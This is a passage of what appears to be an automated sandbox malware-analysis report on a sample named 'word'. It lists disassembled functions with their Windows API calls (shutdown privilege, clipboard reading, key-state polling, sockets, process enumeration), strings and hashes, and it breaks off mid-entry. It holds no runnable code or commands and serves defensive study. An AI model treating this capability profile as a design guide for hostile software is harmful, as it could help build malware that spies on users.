                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                            • GetLastError.KERNEL32 ref: 00436504
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                            • SetSystemPowerState.KERNEL32 ref: 0043656A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 2938487562-3733053543
                                                                            • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                            • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                            • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                            • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                            Function 0043614F Relevance: 16.6, APIs: 11, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 00436162
                                                                            • __swprintf.LIBCMT ref: 00436176
                                                                              • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                            • __wcsicoll.LIBCMT ref: 00436185
                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                            • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                            • LockResource.KERNEL32(?), ref: 004361FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                            • String ID:
                                                                            • API String ID: 2406429042-0
                                                                            • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                            • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                            • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                            • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                            Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                            • GetLastError.KERNEL32 ref: 0045D59D
                                                                            • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                            • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                            • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                            • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                            Function 0047AD92 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                            • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                            • _wcslen.LIBCMT ref: 0047AE18
                                                                            • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AFCC
                                                                            • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                            • String ID: HH
                                                                            • API String ID: 1915432386-2761332787
                                                                            • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                            • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                            • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                            • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                            Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                            • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                            • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketsocket
                                                                            • String ID:
                                                                            • API String ID: 2609815416-0
                                                                            • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                            • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                            • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                            • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                            Function 0043701F Relevance: 10.6, APIs: 7, Instructions: 76processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                            • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                            • __wsplitpath.LIBCMT ref: 004370A5
                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                            • _wcscat.LIBCMT ref: 004370BA
                                                                            • __wcsicoll.LIBCMT ref: 004370C8
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00437105
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                            • String ID:
                                                                            • API String ID: 2547909840-0
                                                                            • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                            • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                            • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                            • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                            Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                            • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                            • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                            • String ID: *.*
                                                                            • API String ID: 2693929171-438819550
                                                                            • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                            • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                            • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                            • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                            Function 0046C5D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69clipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                            • GetClipboardData.USER32 ref: 0046C64F
                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                            • GetClipboardData.USER32 ref: 0046C6DD
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                            • String ID: HH
                                                                            • API String ID: 589737431-2761332787
                                                                            • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                            • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                            • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                            • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                            Function 00436431 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __wcsicoll.LIBCMT ref: 0043643C
                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                            • __wcsicoll.LIBCMT ref: 00436466
                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicollmouse_event
                                                                            • String ID: DOWN
                                                                            • API String ID: 1033544147-711622031
                                                                            • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                            • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                            • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                            • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                            Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 4170576061-0
                                                                            • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                            • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                            • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                            • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                            Function 00456354 Relevance: 7.6, APIs: 5, Instructions: 127keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                            • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                            • GetAsyncKeyState.USER32 ref: 004563D0
                                                                            • GetAsyncKeyState.USER32 ref: 004563DC
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 3539004672-0
                                                                            • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                            • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                            • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                            • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                            Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                            • IsWindowVisible.USER32 ref: 00477314
                                                                            • IsWindowEnabled.USER32 ref: 00477324
                                                                            • GetForegroundWindow.USER32 ref: 00477331
                                                                            • IsIconic.USER32 ref: 0047733F
                                                                            • IsZoomed.USER32 ref: 0047734D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                            • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                            • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                            • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                            Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00436D4F
                                                                            • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00436D93
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleTime
                                                                            • String ID:
                                                                            • API String ID: 3397143404-0
                                                                            • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                            • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                            • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                            • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                            Function 00446566 Relevance: 7.1, Strings: 5, Instructions: 868COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • VUUU, xrefs: 00446968
                                                                            • VUUU, xrefs: 004469C7
                                                                            • VUUU, xrefs: 00446942
                                                                            • 92bc94a96292cfcabd1d0ed0a37f7e0e80fc022afa8dc8820841825def0359945114e2a4cdba1f0312b27aa1b0e695cc0112e585ba133b81cbde9596d767d6a66e, xrefs: 0044681F
                                                                            • ERCP, xrefs: 0044664A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 92bc94a96292cfcabd1d0ed0a37f7e0e80fc022afa8dc8820841825def0359945114e2a4cdba1f0312b27aa1b0e695cc0112e585ba133b81cbde9596d767d6a66e$ERCP$VUUU$VUUU$VUUU
                                                                            • API String ID: 0-2173910491
                                                                            • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                            • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                            • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                            • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                            Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                            Memory Dump Source
